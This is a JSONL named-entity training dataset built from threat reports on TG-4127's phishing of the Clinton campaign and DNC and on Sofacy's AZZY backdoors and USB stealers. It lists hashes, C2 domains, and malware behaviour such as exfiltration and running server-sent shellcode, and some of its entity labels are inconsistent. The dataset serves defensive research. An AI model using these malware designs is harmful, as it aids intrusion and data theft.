{"text": "TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 60, "end": 65, "label": "System"}, {"start": 128, "end": 133, "label": "System"}, {"start": 161, "end": 166, "label": "System"}]}
{"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton.com email account .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 122, "end": 140, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}]}
{"text": "CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016 ; the last link was created in mid-May .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 57, "end": 75, "label": "Indicator"}, {"start": 76, "end": 81, "label": "System"}]}
{"text": "During this period , TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 67, "end": 72, "label": "System"}, {"start": 90, "end": 108, "label": "Indicator"}]}
{"text": "Through open-source research , CTU researchers identified the owners of 66 of the targeted email addresses .", "spans": [{"start": 31, "end": 34, "label": "Organization"}, {"start": 91, "end": 96, "label": "System"}]}
{"text": "There was no open-source footprint for the remaining 42 addresses , suggesting that TG-4127 acquired them from another source , possibly other intelligence activity .", "spans": [{"start": 84, "end": 91, "label": "Organization"}]}
{"text": "The identified email owners held a wide range of responsibilities within the Hillary for America campaign , extending from senior figures to junior employees and the group mailboxes for various regional offices .", "spans": [{"start": 15, "end": 20, "label": "System"}]}
{"text": "Targeted senior figures managed communications and media affairs , policy , speech writing , finance , and travel , while junior figures arranged schedules and travel for Hillary Clinton's campaign trail .", "spans": []}
{"text": "Targets held the following titles :", "spans": []}
{"text": "National political director Finance director Director of strategic communications Director of scheduling Director of travel Traveling press secretary Travel coordinator .", "spans": []}
{"text": "Publicly available Bitly data reveals how many of the short links were clicked , likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 124, "end": 129, "label": "System"}, {"start": 164, "end": 169, "label": "System"}]}
{"text": "Only 20 of the 213 short links have been clicked as of this publication .", "spans": []}
{"text": "Eleven of the links were clicked once , four were clicked twice , two were clicked three times , and two were clicked four times .", "spans": []}
{"text": "The U.S. Democratic party's governing body , the Democratic National Committee ( DNC ) , uses the dnc.org domain for its staff email .", "spans": [{"start": 49, "end": 78, "label": "Organization"}, {"start": 81, "end": 84, "label": "Organization"}, {"start": 98, "end": 105, "label": "Indicator"}, {"start": 127, "end": 132, "label": "System"}]}
{"text": "Between mid-March and mid-April 2016 , TG-4127 created 16 short links targeting nine dnc.org email accounts .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 85, "end": 92, "label": "Indicator"}, {"start": 93, "end": 98, "label": "System"}]}
{"text": "CTU researchers identified the owners of three of these accounts ; two belonged to the DNC 's secretary emeritus , and one belonged to the communications director .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 87, "end": 90, "label": "Organization"}]}
{"text": "Four of the 16 short links were clicked , three by the senior staff members .", "spans": []}
{"text": "As of this publication , dnc.org does not use the Google Apps Gmail email service .", "spans": [{"start": 25, "end": 32, "label": "Indicator"}, {"start": 50, "end": 56, "label": "Organization"}, {"start": 68, "end": 73, "label": "System"}]}
{"text": "However , because dnc.org email accounts were targeted in the same way as hillaryclinton.com accounts , it is likely that dnc.org did use Gmail at that time and later moved to a different service .", "spans": [{"start": 18, "end": 25, "label": "Indicator"}, {"start": 26, "end": 31, "label": "System"}, {"start": 74, "end": 92, "label": "Indicator"}, {"start": 122, "end": 129, "label": "Indicator"}, {"start": 138, "end": 143, "label": "System"}]}
{"text": "CTU researchers do not have evidence that these spearphishing emails are connected to the DNC network compromise that was revealed on June 14 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 62, "end": 68, "label": "System"}, {"start": 90, "end": 93, "label": "Organization"}]}
{"text": "However , a coincidence seems unlikely , and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network .", "spans": [{"start": 45, "end": 48, "label": "Organization"}, {"start": 74, "end": 81, "label": "Organization"}, {"start": 105, "end": 111, "label": "System"}, {"start": 169, "end": 172, "label": "Organization"}]}
{"text": "CTU researchers identified TG-4127 targeting 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign , the DNC , or other aspects of U.S. national politics .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 150, "end": 153, "label": "Organization"}]}
{"text": "Five of the individuals also had a hillaryclinton.com email account that was targeted by TG-4127 .", "spans": [{"start": 35, "end": 53, "label": "Indicator"}, {"start": 54, "end": 59, "label": "System"}, {"start": 89, "end": 96, "label": "Organization"}]}
{"text": "Many of these individuals held communications , media , finance , or policy roles .", "spans": []}
{"text": "They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC .", "spans": [{"start": 118, "end": 121, "label": "Organization"}]}
{"text": "TG-4127 created 150 short links targeting this group .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "As of this publication , 40 of the links have been clicked at least once .", "spans": []}
{"text": "Although the 2015 campaign did not focus on individuals associated with U.S. politics , open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. White House in early 2015 .", "spans": [{"start": 123, "end": 130, "label": "Organization"}]}
{"text": "The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party .", "spans": []}
{"text": "CTU researchers have not observed TG-4127 use this technique ( using Bitly short links ) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May : Donald Trump , Bernie Sanders , Ted Cruz , Marco Rubio , and John Kasich .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 34, "end": 41, "label": "Organization"}, {"start": 69, "end": 74, "label": "System"}]}
{"text": "However , the following email domains do not use Google mail servers and may have been targeted by other means :", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 49, "end": 55, "label": "Organization"}]}
{"text": "gop.com \u2014 used by the Republican National Committee , donaldjtrump.com \u2014 used by the Donald Trump campaign , johnkasich.com \u2014 used by the John Kasich campaign .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 22, "end": 51, "label": "Organization"}, {"start": 54, "end": 70, "label": "Indicator"}, {"start": 109, "end": 123, "label": "Indicator"}]}
{"text": "Access to targets' Google accounts allows TG-4127 to review internal emails and potentially access other Google Apps services used by these organizations , such as Google Drive .", "spans": [{"start": 19, "end": 25, "label": "Organization"}, {"start": 42, "end": 49, "label": "Organization"}, {"start": 69, "end": 75, "label": "System"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 171, "end": 176, "label": "System"}]}
{"text": "In addition to the value of the intelligence , the threat actors could also exploit this access for other malicious activity , such as generating spearphishing emails from internal email addresses to compromise the organizations' networks with malware .", "spans": [{"start": 160, "end": 166, "label": "System"}, {"start": 181, "end": 186, "label": "System"}]}
{"text": "The Russian government views the U.S. as a strategic rival and is known to task its intelligence agencies with gathering confidential information about individuals and organizations close to the center of power in the U.S. Individuals working for the Hillary for America campaign could have information about proposed policies for a Clinton presidency , including foreign-policy positions , which would be valuable to the Russian government .", "spans": []}
{"text": "Information about travel plans and campaign scheduling could provide short-term opportunities for other intelligence operations .", "spans": []}
{"text": "Long-term access to email accounts of senior campaign advisors , who may be appointed to staff positions in a Clinton administration , could provide TG-4127 and the Russian government with access to those individual's accounts .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 149, "end": 156, "label": "Organization"}]}
{"text": "While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": [{"start": 6, "end": 13, "label": "Organization"}]}
{"text": "Non-governmental political organizations may provide access to desirable national policy information , especially foreign policy , but may not have the same level of protection and security as governmental organizations .", "spans": []}
{"text": "Targeting individuals linked to presidential campaigns could represent an intelligence \u2018 long game ,' as establishing access to potential U.S. administration staff before they are appointed could be easier than targeting them when they are established in the White House .", "spans": [{"start": 259, "end": 270, "label": "Organization"}]}
{"text": "Access to an individual's personal or corporate email account provides a substantial amount of useful intelligence , and threat actors could also leverage the access to launch additional attacks to penetrate the network of an associated organization .", "spans": [{"start": 48, "end": 53, "label": "System"}]}
{"text": "Users rarely check the full URL associated with short links , so threat groups can use URL-shortening services to effectively hide malicious URLs .", "spans": []}
{"text": "Threat actors can use the services' detailed statistics about which links were clicked when , and from what location , to track the success of a spearphishing campaign .", "spans": []}
{"text": "A single compromised account could allow TG-4127 to achieve its operational goals .", "spans": [{"start": 41, "end": 48, "label": "Organization"}]}
{"text": "CTU researchers recommend that clients take appropriate precautions to minimize the risk of these types of attacks :", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "Educate users about the risks of spearphishing emails .", "spans": [{"start": 47, "end": 53, "label": "System"}]}
{"text": "Use caution and exercise due diligence when faced with a shortened link , especially in unsolicited email messages .", "spans": [{"start": 100, "end": 105, "label": "System"}]}
{"text": "Pasting Bitly URLs , appended with a plus sign , into the address bar of a web browser reveals the full URL .", "spans": [{"start": 8, "end": 13, "label": "System"}]}
{"text": "Sofacy APT hits high profile targets with updated toolset .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "Sofacy ( also known as \u201c Fancy Bear \u201d , \u201c Sednit \u201d , \u201c STRONTIUM \u201d and \u201c APT28 \u201d ) is an advanced threat group that has been active since around 2008 , targeting mostly military and government entities worldwide , with a focus on NATO countries .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 35, "label": "Organization"}, {"start": 42, "end": 48, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 230, "end": 234, "label": "Organization"}]}
{"text": "More recently , we have also seen an increase in activity targeting Ukraine .", "spans": []}
{"text": "Back in 2011-2012 , the group used a relatively tiny implant ( known as \u201c Sofacy \u201d or SOURFACE ) as its first stage malware .", "spans": [{"start": 74, "end": 80, "label": "Organization"}, {"start": 86, "end": 94, "label": "Malware"}]}
{"text": "The implant shared certain similarities with the old Miniduke implants .", "spans": [{"start": 53, "end": 61, "label": "Organization"}]}
{"text": "This led us to believe the two groups were connected , at least to begin with , although it appears they parted ways in 2014 , with the original Miniduke group switching to the CosmicDuke implant .", "spans": [{"start": 145, "end": 153, "label": "Organization"}, {"start": 177, "end": 187, "label": "Malware"}]}
{"text": "At some point during 2013 , the Sofacy group expanded its arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across four to five generations ) and a few others .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 113, "end": 122, "label": "System"}, {"start": 125, "end": 129, "label": "Malware"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 163, "end": 171, "label": "Malware"}, {"start": 208, "end": 215, "label": "Malware"}, {"start": 228, "end": 232, "label": "Malware"}, {"start": 239, "end": 252, "label": "Malware"}, {"start": 255, "end": 260, "label": "Malware"}, {"start": 263, "end": 271, "label": "Malware"}]}
{"text": "We \u2019ve seen quite a few versions of these implants and they were relatively widespread for a time .", "spans": []}
{"text": "Sofacy \u2019s August 2015 attack wave .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "In the months leading up to August , the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office , Oracle Sun Java , Adobe Flash Player and Windows itself .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 99, "end": 107, "label": "Vulnerability"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 139, "end": 145, "label": "System"}, {"start": 150, "end": 154, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 163, "end": 168, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 180, "end": 187, "label": "System"}]}
{"text": "For instance , its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox .", "spans": [{"start": 19, "end": 27, "label": "Malware"}, {"start": 60, "end": 65, "label": "System"}, {"start": 66, "end": 74, "label": "Vulnerability"}, {"start": 86, "end": 93, "label": "System"}, {"start": 94, "end": 97, "label": "System"}]}
{"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 110, "end": 114, "label": "System"}, {"start": 115, "end": 123, "label": "Vulnerability"}, {"start": 126, "end": 139, "label": "Vulnerability"}]}
{"text": "While the JHUHUGIT ( and more recently , \u201c JKEYSKW \u201d ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZYTrojan .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 218, "end": 228, "label": "Malware"}]}
{"text": "The first versions of the new AZZY implant appeared in August of this year .", "spans": [{"start": 30, "end": 34, "label": "Malware"}]}
{"text": "During a high profile incident we investigated , our products successfully detected and blocked a \u201c standard \u201d Sofacy \u201c AZZY \u201d sample that was used to target a range of defense contractors .", "spans": [{"start": 111, "end": 117, "label": "Organization"}, {"start": 120, "end": 124, "label": "Malware"}]}
{"text": "The sample used in this attack ( MD5 A96F4B8AC7AA9DBF4624424B7602D4F7 , compiled July 29th , 2015 ) was a pretty standard Sofacy x64 AZZY implant , which has the internal name \u201c advshellstore.dll \u201d .", "spans": [{"start": 37, "end": 69, "label": "Indicator"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 133, "end": 137, "label": "Malware"}, {"start": 178, "end": 195, "label": "Indicator"}]}
{"text": "Interestingly , the fact that the attack was blocked didn\u2019t appear to stop the Sofacy team .", "spans": [{"start": 79, "end": 85, "label": "Organization"}]}
{"text": "Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor ( md5: 9D2F9E19DB8C20DC0D20D50869C7A373 , compiled August 4th , 2015 ) .", "spans": [{"start": 70, "end": 74, "label": "Malware"}, {"start": 95, "end": 127, "label": "Indicator"}]}
{"text": "This was no longer detectable with static signatures by our product .", "spans": []}
{"text": "However , it was detected dynamically by the host intrusion prevention subsystem when it appeared in the system and was executed .", "spans": []}
{"text": "This recurring , blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability \u2014 instead , they appeared to be downloaded and installed by another malware .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 113, "end": 121, "label": "Vulnerability"}]}
{"text": "This separate malware was installed by an unknown attack as \u201c AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll \u201d ( md5: CE8B99DF8642C065B6AF43FDE1F786A3 ) .", "spans": [{"start": 62, "end": 107, "label": "Indicator"}, {"start": 117, "end": 149, "label": "Indicator"}]}
{"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors \u201c msdeltemp.dll \u201d according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": [{"start": 24, "end": 56, "label": "Indicator"}, {"start": 82, "end": 95, "label": "Indicator"}, {"start": 184, "end": 190, "label": "Organization"}, {"start": 191, "end": 195, "label": "Malware"}]}
{"text": "It has been modified to drop a separate C&C helper , ( md5: 8C4D896957C36EC4ABEB07B2802268B9 ) as \u201c tf394kv.dll \u201c .", "spans": [{"start": 40, "end": 43, "label": "System"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 100, "end": 111, "label": "Indicator"}]}
{"text": "The dropped \u201c tf394kv.dll \u201d file is an external C&C communications library , compiled on July 24th , 2015 and used by the main backdoor for all Internet-based communications .", "spans": [{"start": 14, "end": 25, "label": "Indicator"}, {"start": 48, "end": 51, "label": "System"}]}
{"text": "This code modification marks an unusual departure from the typical AZZY backdoors , with its C&C communication functions moved to an external DLL file .", "spans": [{"start": 67, "end": 81, "label": "Malware"}, {"start": 93, "end": 96, "label": "System"}, {"start": 142, "end": 145, "label": "System"}]}
{"text": "In the past , the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry , instead of storing it in the malware itself , so this code modularisation follows the same line of thinking .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 53, "end": 67, "label": "Malware"}, {"start": 77, "end": 80, "label": "System"}]}
{"text": "In addition to the new AZZY backdoors with side-DLL for C&C , we observed a new set of data-theft modules deployed against victims by the Sofacy group .", "spans": [{"start": 23, "end": 37, "label": "Malware"}, {"start": 43, "end": 51, "label": "System"}, {"start": 56, "end": 59, "label": "System"}, {"start": 138, "end": 144, "label": "Organization"}]}
{"text": "Among the most popular modern defense mechanisms against APTs are air-gaps \u2014 isolated network segments without Internet access , where sensitive data is stored .", "spans": []}
{"text": "In the past , we \u2019ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks .", "spans": [{"start": 41, "end": 49, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}]}
{"text": "The Sofacy group uses such tools as well .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]}
{"text": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015 .", "spans": [{"start": 32, "end": 43, "label": "System"}]}
{"text": "Older versions of these USBSTEALER modules were previously described by our colleagues from ESET .", "spans": [{"start": 24, "end": 34, "label": "System"}, {"start": 92, "end": 96, "label": "Organization"}]}
{"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp.dll .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 30, "end": 40, "label": "System"}, {"start": 52, "end": 84, "label": "Indicator"}, {"start": 116, "end": 130, "label": "Indicator"}]}
{"text": "This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them , depending on a set of rules defined by the attackers .", "spans": []}
{"text": "The stolen data is copied into a hidden directory as \u201c %MYPICTURES%\\%volume serial number% \u201c , from where it can be exfiltrated by the attackers using one of the AZZY implants .", "spans": [{"start": 162, "end": 166, "label": "Malware"}]}
{"text": "More details on the new USB stealers are available in the section on technical analysis .", "spans": [{"start": 24, "end": 27, "label": "System"}]}
{"text": "Over the last year , the Sofacy group has increased its activity almost tenfold when compared to previous years , becoming one of the most prolific , agile and dynamic threat actors in the arena .", "spans": [{"start": 25, "end": 31, "label": "Organization"}]}
{"text": "This activity spiked in July 2015 , when the group dropped two completely new exploits , an Office and Java zero-day .", "spans": [{"start": 92, "end": 98, "label": "System"}, {"start": 103, "end": 107, "label": "System"}, {"start": 108, "end": 116, "label": "Vulnerability"}]}
{"text": "At the beginning of August , Sofacy began a new wave of attacks , focusing on defense-related targets .", "spans": [{"start": 29, "end": 35, "label": "Organization"}]}
{"text": "As of November 2015 , this wave of attacks is ongoing .", "spans": []}
{"text": "The attackers deploy a rare modification of the AZZY backdoor , which is used for the initial reconnaissance .", "spans": [{"start": 48, "end": 61, "label": "Malware"}]}
{"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \u201c Mimikatz \u201d for lateral movement .", "spans": [{"start": 69, "end": 72, "label": "System"}, {"start": 123, "end": 131, "label": "System"}]}
{"text": "Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience .", "spans": [{"start": 37, "end": 43, "label": "Organization"}]}
{"text": "In the past , the group used droppers that installed both the SPLM and AZZY backdoors on the same machine .", "spans": [{"start": 62, "end": 66, "label": "Malware"}, {"start": 71, "end": 85, "label": "Malware"}]}
{"text": "If one of them was detected , the other one provided the attacker with continued access .", "spans": []}
{"text": "Internal name : DWN_DLL_MAIN.dll File format : PE32 DLL MD5: ce8b99df8642c065b6af43fde1f786a3 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.28 13:05:20 ( GMT ) .", "spans": [{"start": 16, "end": 32, "label": "Indicator"}, {"start": 52, "end": 55, "label": "System"}, {"start": 61, "end": 93, "label": "Indicator"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 128, "end": 141, "label": "System"}, {"start": 183, "end": 186, "label": "System"}]}
{"text": "The library starts its main worker thread from the DllMain function .", "spans": []}
{"text": "Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm .", "spans": []}
{"text": "In addition to that , API function names are reversed , presumably to avoid detection in memory .", "spans": []}
{"text": "Once started , the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location : \u201c %TEMP%\\tf394kv.dll \u201d .", "spans": [{"start": 149, "end": 167, "label": "Indicator"}]}
{"text": "If this file is not present , it is recreated from a hardcoded encrypted array inside the body of the DLL .", "spans": [{"start": 102, "end": 105, "label": "System"}]}
{"text": "Next , the module enters an infinite loop .", "spans": []}
{"text": "Every five minutes it collects basic system information and sends it to the C2 server .", "spans": [{"start": 76, "end": 78, "label": "System"}]}
{"text": "The main thread also spawns a separate thread for receiving new commands from the C2 servers .", "spans": [{"start": 82, "end": 84, "label": "System"}]}
{"text": "Every 10 minutes , it sends a new request to the server .", "spans": []}
{"text": "The server is expected to send back executable code and one of the following commands :", "spans": []}
{"text": "Write a new file \u201c %LOCAL_APPDATA%\\dllhost.exe \u201d or \u201c %TEMP%\\dllhost.exe \u201d and execute it , then delete the file , Write a new file \u201c %LOCAL_APPDATA%\\sechost.dll \u201d or \u201c %TEMP%\\sechost.dll \u201d and call its first exported function using \u201c rundll32.exe \u201d or Windows API , then delete the file , Run shellcode provided by the server in a new thread While processing the commands , the backdoor logs all errors and execution results .", "spans": [{"start": 19, "end": 46, "label": "Indicator"}, {"start": 54, "end": 72, "label": "Indicator"}, {"start": 134, "end": 161, "label": "Indicator"}, {"start": 169, "end": 187, "label": "Indicator"}, {"start": 235, "end": 247, "label": "Indicator"}, {"start": 253, "end": 260, "label": "System"}]}
{"text": "The module also reads the contents of the file \u201c %APPDATA%\\chkdbg.log \u201d and appends it to the results .", "spans": [{"start": 49, "end": 69, "label": "Indicator"}]}
{"text": "It then sends the aggregated log back to the C2 server .", "spans": [{"start": 45, "end": 47, "label": "System"}]}
{"text": "The module aborts the thread receiving C2 command after it fails to correctly execute commands more than six times in a row , i.e. if file or process creation fails .", "spans": [{"start": 39, "end": 41, "label": "System"}]}
{"text": "The export called \u201c k \u201d is a wrapper for the \u201c LoadLibraryA \u201d API function .", "spans": []}
{"text": "The export called \u201c SendDataToServer_2 \u201d does exactly what the name means : it encrypts all collected data , encodes it using Base64 encoding and calls its additional library to send the data to the C2 server .", "spans": [{"start": 199, "end": 201, "label": "System"}]}
{"text": "The names of the C2 servers are hardcoded .", "spans": [{"start": 17, "end": 19, "label": "System"}]}
{"text": "The two C&C \u2019s hardcoded in the configuration block of the main binary are :", "spans": [{"start": 8, "end": 11, "label": "System"}]}
{"text": "intelnetservice.com intelsupport.net The export called \u201c Applicate \u201d runs a standard Windows application message loop until a \u201c WM_ENDSESSION \u201d message is received .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 20, "end": 36, "label": "Indicator"}, {"start": 85, "end": 92, "label": "System"}]}
{"text": "It then terminates the main thread .", "spans": []}
{"text": "Internal name : snd.dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": [{"start": 16, "end": 23, "label": "Indicator"}, {"start": 43, "end": 46, "label": "System"}, {"start": 52, "end": 84, "label": "Indicator"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 119, "end": 132, "label": "System"}, {"start": 174, "end": 177, "label": "System"}]}
{"text": "10001580: Init 10001620: InternetExchange 10001650: SendData This external library implements a simple Wininet-based transport for the main module .", "spans": []}
{"text": "The strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": []}
{"text": "The DllMain function initializes the library and resolves all required Windows API functions .", "spans": [{"start": 71, "end": 78, "label": "System"}]}
{"text": "The \u201c Init \u201d export establishes connection to port 80 of a C2 server using Wininet API .", "spans": [{"start": 59, "end": 61, "label": "System"}, {"start": 75, "end": 82, "label": "System"}]}
{"text": "The user agent string employed is \u201c MSIE 8.0 \u201d .", "spans": [{"start": 36, "end": 40, "label": "System"}]}
{"text": "The \u201c SendData \u201d export sends a HTTP POST request using a hardcoded URI \u201c /store/ \u201c .", "spans": [{"start": 32, "end": 36, "label": "Indicator"}]}
{"text": "The reply , if its length is not equal to six and its contents do not contain \u201c OK \u201d is returned back to the caller .", "spans": []}
{"text": "The \u201c InternetExchange \u201d export closes the established connection and frees associated handles .", "spans": []}
{"text": "Sofacy AZZY 4.3 dropper analysis File format : PE32 EXE File size : 142,336 bytes MD5: c3ae4a37094ecfe95c2badecf40bf5bb Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 10:01:59 ( GMT ) Most of the strings and data in the file are encrypted using 3DES and XOR .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 7, "end": 11, "label": "Malware"}, {"start": 52, "end": 55, "label": "System"}, {"start": 87, "end": 119, "label": "Indicator"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 154, "end": 167, "label": "System"}, {"start": 209, "end": 212, "label": "System"}]}
{"text": "The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 34, "end": 40, "label": "System"}, {"start": 101, "end": 108, "label": "System"}, {"start": 109, "end": 123, "label": "System"}]}
{"text": "First , it creates a new directory : \u201c %LOCAL_APPDATA%\\Microsoft\\Windows \u201d .", "spans": [{"start": 39, "end": 72, "label": "System"}]}
{"text": "If the directory creation fails it tries to install into \u201c %TEMP% \u201d directory instead .", "spans": []}
{"text": "Next it writes a hardcoded binary from its body to \u201c msdeltemp.dll \u201d into the target directory .", "spans": [{"start": 53, "end": 66, "label": "Indicator"}]}
{"text": "If the file exists it then moves it to \u201c __tmpdt.tmp \u201d in the same directory and continues the installation .", "spans": [{"start": 41, "end": 52, "label": "Indicator"}]}
{"text": "Sets file creation timestamp to that of \u201c %SYSTEM%\\sfc.dll \u201d .", "spans": [{"start": 42, "end": 58, "label": "Indicator"}]}
{"text": "Finally , the program removes itself by starting the following command : \u201c cmd /c DEL %path to self% \u201c The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89 .", "spans": [{"start": 75, "end": 78, "label": "System"}, {"start": 134, "end": 166, "label": "Indicator"}]}
{"text": "Dropper payload \u2013 downloader DLL Internal name : msdetltemp.dll File format : PE32 DLL File size : 73 728 bytes MD5: f6f88caf49a3e32174387cacfa144a89 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 07:20:02 ( GMT ) Exported functions :", "spans": [{"start": 29, "end": 32, "label": "System"}, {"start": 49, "end": 63, "label": "Indicator"}, {"start": 83, "end": 86, "label": "System"}, {"start": 117, "end": 149, "label": "Indicator"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 184, "end": 197, "label": "System"}, {"start": 239, "end": 242, "label": "System"}]}
{"text": "10002B55: Applicate Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed .", "spans": []}
{"text": "The library is an older version of the \u201c DWN_DLL_MAIN.dll \u201d ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": [{"start": 41, "end": 57, "label": "Indicator"}, {"start": 67, "end": 99, "label": "Indicator"}]}
{"text": "The DllMain function is identical and starts the main thread ; the \u201c Applicate \u201d function is identical to the one in the newer library .", "spans": []}
{"text": "This version of the module does not rely on an external transport DLL for communicating with its C2 servers ; instead it directly uses Wininet API functions .", "spans": [{"start": 66, "end": 69, "label": "System"}, {"start": 97, "end": 99, "label": "System"}, {"start": 135, "end": 142, "label": "System"}]}
{"text": "The module contains the following hardcoded C2 server names :", "spans": [{"start": 44, "end": 46, "label": "System"}]}
{"text": "drivres-update.info softupdates.info The module uses a hardcoded URL ( \u201c /check/ \u201c ) for sending HTTP POST requests to its C2 servers .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 20, "end": 36, "label": "Indicator"}, {"start": 97, "end": 101, "label": "Indicator"}, {"start": 123, "end": 125, "label": "System"}]}
{"text": "Sofacy APT hits high profile targets with updated toolset .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "File collection module ( \u201c USB Stealer \u201d ) Internal name : msdetltemp.dll ( from resources ) File size : 50,176 bytes File format : PE32 EXE MD5: 0369620eb139c3875a62e36bb7abdae8 Linker version : 10.0 , Microsoft Visual Studio Linker timestamp : 2015.02.09 11:48:01 ( GMT ) Most of the strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": [{"start": 27, "end": 38, "label": "System"}, {"start": 59, "end": 73, "label": "Indicator"}, {"start": 137, "end": 140, "label": "System"}, {"start": 146, "end": 178, "label": "Indicator"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 213, "end": 226, "label": "System"}, {"start": 268, "end": 271, "label": "System"}]}
{"text": "The program creates the mutex \u201c mtx \u201d and an event named \u201c WerTyQ34C \u201d .", "spans": []}
{"text": "Upon start , it creates a window with the class name \u201c Hello \u201d and title \u201c Program \u201d , subscribes for device arrival notifications for that window and enters a standard Windows message processing loop .", "spans": [{"start": 169, "end": 176, "label": "System"}]}
{"text": "The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival .", "spans": []}
